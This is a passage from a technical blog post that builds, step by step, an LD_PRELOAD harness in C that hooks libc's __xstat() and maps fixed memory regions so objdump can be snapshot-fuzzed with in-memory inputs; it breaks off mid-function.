<p>First thing we need to do, is create a fake file name to give objdump so that we can start testing things out. We will copy <code class="language-plaintext highlighter-rouge">/bin/ls</code> into the current working directory and call it <code class="language-plaintext highlighter-rouge">fuzzme</code>. This will allow us to generically play around with the harness for testing purposes. Now we have our <code class="language-plaintext highlighter-rouge">strace</code> output, we know that objdump calls <code class="language-plaintext highlighter-rouge">stat()</code> on the path for our input file (<code class="language-plaintext highlighter-rouge">/bin/ls</code>) a couple of times before we get that call to <code class="language-plaintext highlighter-rouge">openat()</code>. Since we know our file hasn’t been opened yet, and the syscall uses the path for the first arg, we can guess that this syscall results from the libc exported wrapper function for <code class="language-plaintext highlighter-rouge">stat()</code> or <code class="language-plaintext highlighter-rouge">lstat()</code>. I’m going to assume <code class="language-plaintext highlighter-rouge">stat()</code> since we aren’t dealing with any symbolic links for <code class="language-plaintext highlighter-rouge">/bin/ls</code> on my box. We can add a hook for <code class="language-plaintext highlighter-rouge">stat()</code> to test to see if we hit it and check if it’s being called for our target input file (now changed to <code class="language-plaintext highlighter-rouge">fuzzme</code>).</p>

<p>In order to create a hook, we will follow a pattern where we define a pointer to the real function via a <code class="language-plaintext highlighter-rouge">typedef</code> and then we will initialize the pointer as <code class="language-plaintext highlighter-rouge">NULL</code>. Once we need to resolve the location of the <strong>real</strong> function we are hooking, we can use <code class="language-plaintext highlighter-rouge">dlsym(RLTD_NEXT, &lt;symbol name&gt;)</code> to get it’s location and change the pointer value to the real symbol address. (This will be more clear later on).</p>

<p>Now we need to hook <code class="language-plaintext highlighter-rouge">stat()</code> which appears as a <code class="language-plaintext highlighter-rouge">man 3</code> entry <a href="https://linux.die.net/man/3/stat">here</a> (meaning it’s a libc exported function) as well as a <code class="language-plaintext highlighter-rouge">man 2</code> entry (meaning it is a syscall). This was confusing to me for the longest time and I often misunderstood how syscalls actually worked because of this insistence on naming collisions. You can read one of the first research blogposts I ever did <a href="https://h0mbre.github.io/Learn-C-By-Creating-A-Rootkit/">here</a> where the confusion is palpable and I often make erroneous claims. (PS, I’ll never edit the old blogposts with errors in them, they are like time capsules, and it’s kind of cool to me).</p>

<p>We want to write a function that when called, simply prints something and exits so that we know our hook was hit. For now, our code looks like this:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* 
Compiler flags: 
gcc -shared -Wall -Werror -fPIC blog_harness.c -o blog_harness.so -ldl
*/</span>

<span class="cp">#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="c1"> /* printf */</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/stat.h&gt;</span><span class="c1"> /* stat */</span><span class="cp">
#include</span> <span class="cpf">&lt;stdlib.h&gt;</span><span class="c1"> /* exit */</span><span class="cp">
</span>
<span class="c1">// Filename of the input file we're trying to emulate</span>
<span class="cp">#define FUZZ_TARGET "fuzzme"
</span>
<span class="c1">// Declare a prototype for the real stat as a function pointer</span>
<span class="k">typedef</span> <span class="nf">int</span> <span class="p">(</span><span class="o">*</span><span class="n">stat_t</span><span class="p">)(</span><span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="kr">restrict</span> <span class="n">path</span><span class="p">,</span> <span class="k">struct</span> <span class="n">stat</span> <span class="o">*</span><span class="kr">restrict</span> <span class="n">buf</span><span class="p">);</span>
<span class="n">stat_t</span> <span class="n">real_stat</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>

<span class="c1">// Hook function, objdump will call this stat instead of the real one</span>
<span class="kt">int</span> <span class="nf">stat</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="kr">restrict</span> <span class="n">path</span><span class="p">,</span> <span class="k">struct</span> <span class="n">stat</span> <span class="o">*</span><span class="kr">restrict</span> <span class="n">buf</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"** stat() hook!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
<span class="p">}</span>

<span class="c1">// Routine to be called when our shared object is loaded</span>
<span class="n">__attribute__</span><span class="p">((</span><span class="n">constructor</span><span class="p">))</span> <span class="k">static</span> <span class="kt">void</span> <span class="nf">_hook_load</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"** LD_PRELOAD shared object loaded!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>However, if we compile and run that, we don’t ever print and exit so our hook is not being called. Something is going wrong. Sometimes, file related functions in libc have <code class="language-plaintext highlighter-rouge">64</code> variants, such as <code class="language-plaintext highlighter-rouge">open()</code> and <code class="language-plaintext highlighter-rouge">open64()</code> that are used somewhat interchangably depending on configurations and flags. I tried hooking a <code class="language-plaintext highlighter-rouge">stat64()</code> but still had no luck with the hook being reached.</p>

<p>Luckily, I’m not the first person with this problem, there is a <a href="https://stackoverflow.com/questions/5478780/c-and-ld-preload-open-and-open64-calls-intercepted-but-not-stat64">great answer on Stackoverflow about the very issue</a> that describes how libc doesn’t actually export <code class="language-plaintext highlighter-rouge">stat()</code> the same way it does for other functions like <code class="language-plaintext highlighter-rouge">open()</code> and <code class="language-plaintext highlighter-rouge">open64()</code>, instead it exports a symbol called <code class="language-plaintext highlighter-rouge">__xstat()</code> which has a slightly different signature and requires a new argument called <code class="language-plaintext highlighter-rouge">version</code> which is meant to describe which version of <code class="language-plaintext highlighter-rouge">stat struct</code> the caller is expecting. This is supposed to all happen magically under the hood but that’s where we live now, so we have to make the magic happen ourselves. The same rules apply for <code class="language-plaintext highlighter-rouge">lstat()</code> and <code class="language-plaintext highlighter-rouge">fstat()</code> as well, they have <code class="language-plaintext highlighter-rouge">__lxstat()</code> and <code class="language-plaintext highlighter-rouge">__fxstat()</code> respectively.</p>

<p>I found the definitions for the functions <a href="https://refspecs.linuxfoundation.org/LSB_1.1.0/gLSB/baselib-xstat-1.html">here</a>. So we can add the <code class="language-plaintext highlighter-rouge">__xstat()</code> hook to our shared object in place of the <code class="language-plaintext highlighter-rouge">stat()</code> and see if our luck changes. Our code now looks like this:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* 
Compiler flags: 
gcc -shared -Wall -Werror -fPIC blog_harness.c -o blog_harness.so -ldl
*/</span>

<span class="cp">#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="c1"> /* printf */</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/stat.h&gt;</span><span class="c1"> /* stat */</span><span class="cp">
#include</span> <span class="cpf">&lt;stdlib.h&gt;</span><span class="c1"> /* exit */</span><span class="cp">
#include</span> <span class="cpf">&lt;unistd.h&gt;</span><span class="c1"> /* __xstat, __fxstat */</span><span class="cp">
</span>
<span class="c1">// Filename of the input file we're trying to emulate</span>
<span class="cp">#define FUZZ_TARGET "fuzzme"
</span>
<span class="c1">// Declare a prototype for the real stat as a function pointer</span>
<span class="k">typedef</span> <span class="nf">int</span> <span class="p">(</span><span class="o">*</span><span class="n">__xstat_t</span><span class="p">)(</span><span class="kt">int</span> <span class="n">__ver</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">__filename</span><span class="p">,</span> <span class="k">struct</span> <span class="n">stat</span> <span class="o">*</span><span class="n">__stat_buf</span><span class="p">);</span>
<span class="n">__xstat_t</span> <span class="n">real_xstat</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>

<span class="c1">// Hook function, objdump will call this stat instead of the real one</span>
<span class="kt">int</span> <span class="nf">__xstat</span><span class="p">(</span><span class="kt">int</span> <span class="n">__ver</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">__filename</span><span class="p">,</span> <span class="k">struct</span> <span class="n">stat</span> <span class="o">*</span><span class="n">__stat_buf</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"** Hit our __xstat() hook!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
<span class="p">}</span>

<span class="c1">// Routine to be called when our shared object is loaded</span>
<span class="n">__attribute__</span><span class="p">((</span><span class="n">constructor</span><span class="p">))</span> <span class="k">static</span> <span class="kt">void</span> <span class="nf">_hook_load</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"** LD_PRELOAD shared object loaded!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Now if we run our shared object, we get the desired outcome, somewhere, our hook is hit. Now we can help ourselves out a bit and print the filenames being requested by the hook and then actually call the real <code class="language-plaintext highlighter-rouge">__xstat()</code> on behalf of the caller. Now when our hook is hit, we will have to resolve the location of the real <code class="language-plaintext highlighter-rouge">__xstat()</code> by name, so we’ll add a symbol resolving function to our shared object. Our shared object code now looks like this:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* 
Compiler flags: 
gcc -shared -Wall -Werror -fPIC blog_harness.c -o blog_harness.so -ldl
*/</span>

<span class="cp">#define _GNU_SOURCE     </span><span class="cm">/* dlsym */</span><span class="cp">
#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="c1"> /* printf */</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/stat.h&gt;</span><span class="c1"> /* stat */</span><span class="cp">
#include</span> <span class="cpf">&lt;stdlib.h&gt;</span><span class="c1"> /* exit */</span><span class="cp">
#include</span> <span class="cpf">&lt;unistd.h&gt;</span><span class="c1"> /* __xstat, __fxstat */</span><span class="cp">
#include</span> <span class="cpf">&lt;dlfcn.h&gt;</span><span class="c1"> /* dlsym and friends */</span><span class="cp">
</span>
<span class="c1">// Filename of the input file we're trying to emulate</span>
<span class="cp">#define FUZZ_TARGET "fuzzme"
</span>
<span class="c1">// Declare a prototype for the real stat as a function pointer</span>
<span class="k">typedef</span> <span class="nf">int</span> <span class="p">(</span><span class="o">*</span><span class="n">__xstat_t</span><span class="p">)(</span><span class="kt">int</span> <span class="n">__ver</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">__filename</span><span class="p">,</span> <span class="k">struct</span> <span class="n">stat</span> <span class="o">*</span><span class="n">__stat_buf</span><span class="p">);</span>
<span class="n">__xstat_t</span> <span class="n">real_xstat</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>

<span class="c1">// Returns memory address of *next* location of symbol in library search order</span>
<span class="k">static</span> <span class="kt">void</span> <span class="o">*</span><span class="nf">_resolve_symbol</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">symbol</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Clear previous errors</span>
    <span class="n">dlerror</span><span class="p">();</span>

    <span class="c1">// Get symbol address</span>
    <span class="kt">void</span><span class="o">*</span> <span class="n">addr</span> <span class="o">=</span> <span class="n">dlsym</span><span class="p">(</span><span class="n">RTLD_NEXT</span><span class="p">,</span> <span class="n">symbol</span><span class="p">);</span>

    <span class="c1">// Check for error</span>
    <span class="kt">char</span><span class="o">*</span> <span class="n">err</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
    <span class="n">err</span> <span class="o">=</span> <span class="n">dlerror</span><span class="p">();</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">err</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">addr</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"Err resolving '%s' addr: %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">symbol</span><span class="p">,</span> <span class="n">err</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>
    
    <span class="k">return</span> <span class="n">addr</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// Hook function, objdump will call this stat instead of the real one</span>
<span class="kt">int</span> <span class="nf">__xstat</span><span class="p">(</span><span class="kt">int</span> <span class="n">__ver</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">__filename</span><span class="p">,</span> <span class="k">struct</span> <span class="n">stat</span> <span class="o">*</span><span class="n">__stat_buf</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Print the filename requested</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"** __xstat() hook called for filename: '%s'</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">__filename</span><span class="p">);</span>

    <span class="c1">// Resolve the address of the real __xstat() on demand and only once</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">real_xstat</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">real_xstat</span> <span class="o">=</span> <span class="n">_resolve_symbol</span><span class="p">(</span><span class="s">"__xstat"</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Call the real __xstat() for the caller so everything keeps going</span>
    <span class="k">return</span> <span class="n">real_xstat</span><span class="p">(</span><span class="n">__ver</span><span class="p">,</span> <span class="n">__filename</span><span class="p">,</span> <span class="n">__stat_buf</span><span class="p">);</span>
<span class="p">}</span>

<span class="c1">// Routine to be called when our shared object is loaded</span>
<span class="n">__attribute__</span><span class="p">((</span><span class="n">constructor</span><span class="p">))</span> <span class="k">static</span> <span class="kt">void</span> <span class="nf">_hook_load</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"** LD_PRELOAD shared object loaded!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Ok so now when we run this, and we check for our print statements, things get a little spicy.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>h0mbre@ubuntu:~/blogpost$ LD_PRELOAD=/home/h0mbre/blogpost/blog_harness.so objdump -D fuzzme &gt; /tmp/output.txt &amp;&amp; grep "** __xstat" /tmp/output.txt
** __xstat() hook called for filename: 'fuzzme'
** __xstat() hook called for filename: 'fuzzme'
</code></pre></div></div>

<p>So now we can have some fun.</p>

<h2 id="__xstat-hook">__xstat() Hook</h2>

<p>So the purpose of this hook will be to lie to objdump and make it think it successfully <code class="language-plaintext highlighter-rouge">stat()</code> the input file. Remember, we’re making a snapshot fuzzing harness so our objective is to constantly be creating new inputs and feeding them to objdump through this harness. Most importantly, our harness will need to be able to represent our variable length inputs (which will be stored purely in memory) as files. Each fuzzcase, the file length can change and our harness needs to accomodate that.</p>

<p>My idea at this point was to create a somewhat “legit” <code class="language-plaintext highlighter-rouge">stat struct</code> that would normally be returned for our actual file <code class="language-plaintext highlighter-rouge">fuzzme</code> which is just a copy of <code class="language-plaintext highlighter-rouge">/bin/ls</code>. We can store this <code class="language-plaintext highlighter-rouge">stat struct</code> globally and only update the size field as each new fuzz case comes through. So the timeline of our snapshot fuzzing workflow would look something like:</p>
<ol>
  <li>Our <code class="language-plaintext highlighter-rouge">constructor</code> function is called when our shared object is loaded</li>
  <li>Our <code class="language-plaintext highlighter-rouge">constructor</code> sets up a global “legit” <code class="language-plaintext highlighter-rouge">stat struct</code> that we can update for each fuzzcase and pass back to callers of <code class="language-plaintext highlighter-rouge">__xstat()</code> trying to <code class="language-plaintext highlighter-rouge">stat()</code> our fuzzing target</li>
  <li>The imaginary fuzzer runs objdump to the snapshot location</li>
  <li>Our <code class="language-plaintext highlighter-rouge">__xstat()</code> hook updates the the global “legit” <code class="language-plaintext highlighter-rouge">stat struct</code> size field and copies the <code class="language-plaintext highlighter-rouge">stat struct</code> into the caller’s buffer</li>
  <li>The imaginary fuzzer restores the state of objdump to its state at snapshot time</li>
  <li>The imaginary fuzzer copies a new input into harness and updates the input size</li>
  <li>Our <code class="language-plaintext highlighter-rouge">__xstat()</code> hook is called once again, and we repeat step 4, this process occurs over and over forever.</li>
</ol>

<p>So we’re imagining the fuzzer has some routine like this in pseudocode, even though it’d likely be cross-process and require <code class="language-plaintext highlighter-rouge">process_vm_writev</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>insert_fuzzcase(config.input_location, config.input_size_location, input, input_size) {
  memcpy(config.input_location, &amp;input, input_size);
  memcpy(config.input_size_location, &amp;input_size, sizeof(size_t));
}
</code></pre></div></div>

<p>One important thing to keep in mind is that if the snapshot fuzzer is restoring objdump to its snapshot state every fuzzing iteration, we must be careful not to depend on any global mutable memory. The global <code class="language-plaintext highlighter-rouge">stat struct</code> will be safe since it will be instantiated during the <code class="language-plaintext highlighter-rouge">constructor</code> however, its size-field will be restored to its original value each fuzzing iteration by the fuzzer’s snapshot restore routine.</p>

<p>We will also need a global, recognizable address to store variable mutable global data like the current input’s size. Several snapshot fuzzers have the flexibility to ignore contiguous ranges of memory for restoration purposes. So if we’re able to create some contiguous buffers in memory at recognizable addresses, we can have our imaginary fuzzer ignore those ranges for snapshot restorations. So we need to have a place to store the inputs, as well as information about their size. We would then somehow tell the fuzzer about these locations and when it generated a new input, it would copy it into the input location and then update the current input size information.</p>

<p>So now our constructor has an additional job: setup the input location as well as the input size information. We can do this easily with a call to <code class="language-plaintext highlighter-rouge">mmap()</code> which will allow us to specify an address we want our mapping mapped to with the <code class="language-plaintext highlighter-rouge">MAP_FIXED</code> flag. We’ll also create a <code class="language-plaintext highlighter-rouge">MAX_INPUT_SZ</code> definition so that we know how much memory to map from the input location.</p>

<p>Just by themselves, the functions related to mapping memory space for the inputs themselves and their size information looks like this. Notice that we use <code class="language-plaintext highlighter-rouge">MAP_FIXED</code> and we check the returned address from <code class="language-plaintext highlighter-rouge">mmap()</code> just to make sure the call didn’t succeed but map our memory at a different location:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Map memory to hold our inputs in memory and information about their size</span>
<span class="k">static</span> <span class="kt">void</span> <span class="nf">_create_mem_mappings</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="kt">void</span> <span class="o">*</span><span class="n">result</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>

    <span class="c1">// Map the page to hold the input size</span>
    <span class="n">result</span> <span class="o">=</span> <span class="n">mmap</span><span class="p">(</span>
        <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)(</span><span class="n">INPUT_SZ_ADDR</span><span class="p">),</span>
        <span class="k">sizeof</span><span class="p">(</span><span class="kt">size_t</span><span class="p">),</span>
        <span class="n">PROT_READ</span> <span class="o">|</span> <span class="n">PROT_WRITE</span><span class="p">,</span>
        <span class="n">MAP_PRIVATE</span> <span class="o">|</span> <span class="n">MAP_ANONYMOUS</span> <span class="o">|</span> <span class="n">MAP_FIXED</span><span class="p">,</span>
        <span class="mi">0</span><span class="p">,</span>
        <span class="mi">0</span>
    <span class="p">);</span>
    <span class="k">if</span> <span class="p">((</span><span class="n">MAP_FAILED</span> <span class="o">==</span> <span class="n">result</span><span class="p">)</span> <span class="o">||</span> <span class="p">(</span><span class="n">result</span> <span class="o">!=</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="n">INPUT_SZ_ADDR</span><span class="p">))</span> <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"Err mapping INPUT_SZ_ADDR, mapped @ %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">result</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Let's actually initialize the value at the input size location as well</span>
    <span class="o">*</span><span class="p">(</span><span class="kt">size_t</span> <span class="o">*</span><span class="p">)</span><span class="n">INPUT_SZ_ADDR</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

    <span class="c1">// Map the pages to hold the input contents</span>
    <span class="n">result</span> <span class="o">=</span> <span class="n">mmap</span><span class="p">(</span>
        <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)(</span><span class="n">INPUT_ADDR</span><span class="p">),</span>
        <span class="p">(</span><span class="kt">size_t</span><span class="p">)(</span><span class="n">MAX_INPUT_SZ</span><span class="p">),</span>
        <span class="n">PROT_READ</span> <span class="o">|</span> <span class="n">PROT_WRITE</span><span class="p">,</span>
        <span class="n">MAP_PRIVATE</span> <span class="o">|</span> <span class="n">MAP_ANONYMOUS</span> <span class="o">|</span> <span class="n">MAP_FIXED</span><span class="p">,</span>
        <span class="mi">0</span><span class="p">,</span>
        <span class="mi">0</span>
    <span class="p">);</span>
    <span class="k">if</span> <span class="p">((</span><span class="n">MAP_FAILED</span> <span class="o">==</span> <span class="n">result</span><span class="p">)</span> <span class="o">||</span> <span class="p">(</span><span class="n">result</span> <span class="o">!=</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="n">INPUT_ADDR</span><span class="p">))</span> <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"Err mapping INPUT_ADDR, mapped @ %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">result</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Init the value</span>
    <span class="n">memset</span><span class="p">((</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="n">INPUT_ADDR</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="p">(</span><span class="kt">size_t</span><span class="p">)</span><span class="n">MAX_INPUT_SZ</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">mmap()</code> will actually map multiples of whatever the page size is on your system (typically 4096 bytes). So, when we ask for <code class="language-plaintext highlighter-rouge">sizeof(size_t)</code> bytes for the mapping, <code class="language-plaintext highlighter-rouge">mmap()</code> is like: “Hmm, that’s just a page dude” and gives us back a whole page from <code class="language-plaintext highlighter-rouge">0x1336000 - 0x1337000</code> not inclusive on the high-end.</p>

<p><strong>Random sidenote, be careful about arithmetic in definitions and macros as I’ve done here with <code class="language-plaintext highlighter-rouge">MAX_INPUT_SIZE</code>, it’s very easy for the pre-processor to substitute your text for the definition keyword and ruin some order of operations or even overflow a specific primitive type like <code class="language-plaintext highlighter-rouge">int</code>.</strong></p>

<p>Now that we have memory set up for the fuzzer to store inputs and information about the input’s size, we can create that global stat struct. But we actually have a big problem. How can we call into <code class="language-plaintext highlighter-rouge">__xstat()</code> to get our “legit” <code class="language-plaintext highlighter-rouge">stat struct</code> if we have <code class="language-plaintext highlighter-rouge">__xstat()</code> hooked? We would hit our own hook. To circumvent this, we can call <code class="language-plaintext highlighter-rouge">__xstat()</code> with a special <code class="language-plaintext highlighter-rouge">__ver</code> argument that we know will mean that it was called from our <code class="language-plaintext highlighter-rouge">constructor</code>, the variable is an <code class="language-plaintext highlighter-rouge">int</code> so let’s go with <code class="language-plaintext highlighter-rouge">0x1337</code> as the special value. That way, in our hook, if we check <code class="language-plaintext highlighter-rouge">__ver</code> and it’s <code class="language-plaintext highlighter-rouge">0x1337</code>, we know we are being called from the <code class="language-plaintext highlighter-rouge">constructor</code> and we can actually stat our real file and create a global “legit” <code class="language-plaintext highlighter-rouge">stat struct</code>. When I dumped a normal call by objdump to <code class="language-plaintext highlighter-rouge">__xstat()</code> the <code class="language-plaintext highlighter-rouge">__version</code> was always a value of <code class="language-plaintext highlighter-rouge">1</code> so we will patch it back to that inside our hook. Now our entire shared object source file should look like this:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* 
Compiler flags: 
gcc -shared -Wall -Werror -fPIC blog_harness.c -o blog_harness.so -ldl
*/</span>

<span class="cp">#define _GNU_SOURCE     </span><span class="cm">/* dlsym */</span><span class="cp">
#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="c1"> /* printf */</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/stat.h&gt;</span><span class="c1"> /* stat */</span><span class="cp">
#include</span> <span class="cpf">&lt;stdlib.h&gt;</span><span class="c1"> /* exit */</span><span class="cp">
#include</span> <span class="cpf">&lt;unistd.h&gt;</span><span class="c1"> /* __xstat, __fxstat */</span><span class="cp">
#include</span> <span class="cpf">&lt;dlfcn.h&gt;</span><span class="c1"> /* dlsym and friends */</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/mman.h&gt;</span><span class="c1"> /* mmap */</span><span class="cp">
#include</span> <span class="cpf">&lt;string.h&gt;</span><span class="c1"> /* memset */</span><span class="cp">
</span>
<span class="c1">// Filename of the input file we're trying to emulate</span>
<span class="cp">#define FUZZ_TARGET "fuzzme"
</span>
<span class="c1">// Definitions for our in-memory inputs </span>
<span class="cp">#define INPUT_SZ_ADDR   0x1336000
#define INPUT_ADDR      0x1337000
#define MAX_INPUT_SZ    (1024 * 1024)
</span>
<span class="c1">// Our "legit" global stat struct</span>
<span class="k">struct</span> <span class="n">stat</span> <span class="n">st</span><span class="p">;</span>

<span class="c1">// Declare a prototype for the real stat as a function pointer</span>
<span class="k">typedef</span> <span class="nf">int</span> <span class="p">(</span><span class="o">*</span><span class="n">__xstat_t</span><span class="p">)(</span><span class="kt">int</span> <span class="n">__ver</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">__filename</span><span class="p">,</span> <span class="k">struct</span> <span class="n">stat</span> <span class="o">*</span><span class="n">__stat_buf</span><span class="p">);</span>
<span class="n">__xstat_t</span> <span class="n">real_xstat</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>

<span class="c1">// Returns memory address of *next* location of symbol in library search order</span>
<span class="k">static</span> <span class="kt">void</span> <span class="o">*</span><span class="nf">_resolve_symbol</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">symbol</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Clear previous errors</span>
    <span class="n">dlerror</span><span class="p">();</span>

    <span class="c1">// Get symbol address</span>
    <span class="kt">void</span><span class="o">*</span> <span class="n">addr</span> <span class="o">=</span> <span class="n">dlsym</span><span class="p">(</span><span class="n">RTLD_NEXT</span><span class="p">,</span> <span class="n">symbol</span><span class="p">);</span>

    <span class="c1">// Check for error</span>
    <span class="kt">char</span><span class="o">*</span> <span class="n">err</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
    <span class="n">err</span> <span class="o">=</span> <span class="n">dlerror</span><span class="p">();</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">err</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">addr</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"Err resolving '%s' addr: %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">symbol</span><span class="p">,</span> <span class="n">err</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>
    
    <span class="k">return</span> <span class="n">addr</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// Hook for __xstat </span>
<span class="kt">int</span> <span class="nf">__xstat</span><span class="p">(</span><span class="kt">int</span> <span class="n">__ver</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">__filename</span><span class="p">,</span> <span class="k">struct</span> <span class="n">stat</span><span class="o">*</span> <span class="n">__stat_buf</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Resolve the real __xstat() on demand and maybe multiple times!</span>
    <span class="k">if</span> <span class="p">(</span><span class="nb">NULL</span> <span class="o">==</span> <span class="n">real_xstat</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">real_xstat</span> <span class="o">=</span> <span class="n">_resolve_symbol</span><span class="p">(</span><span class="s">"__xstat"</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Assume the worst, always</span>
    <span class="kt">int</span> <span class="n">ret</span> <span class="o">=</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>

    <span class="c1">// Special __ver value check to see if we're calling from constructor</span>
    <span class="k">if</span> <span class="p">(</span><span class="mh">0x1337</span> <span class="o">==</span> <span class="n">__ver</span><span class="p">)</span> <span class="p">{</span>
        <span class="c1">// Patch back up the version value before sending to real xstat</span>
        <span class="n">__ver</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>

        <span class="n">ret</span> <span class="o">=</span> <span class="n">real_xstat</span><span class="p">(</span><span class="n">__ver</span><span class="p">,</span> <span class="n">__filename</span><span class="p">,</span> <span class="n">__stat_buf</span><span class="p">);</span>

        <span class="c1">// Set the real_xstat back to NULL</span>
        <span class="n">real_xstat</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
        <span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="c1">// Determine if we're stat'ing our fuzzing target</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">strcmp</span><span class="p">(</span><span class="n">__filename</span><span class="p">,</span> <span class="n">FUZZ_TARGET</span><span class="p">))</span> <span class="p">{</span>
        <span class="c1">// Update our global stat struct</span>
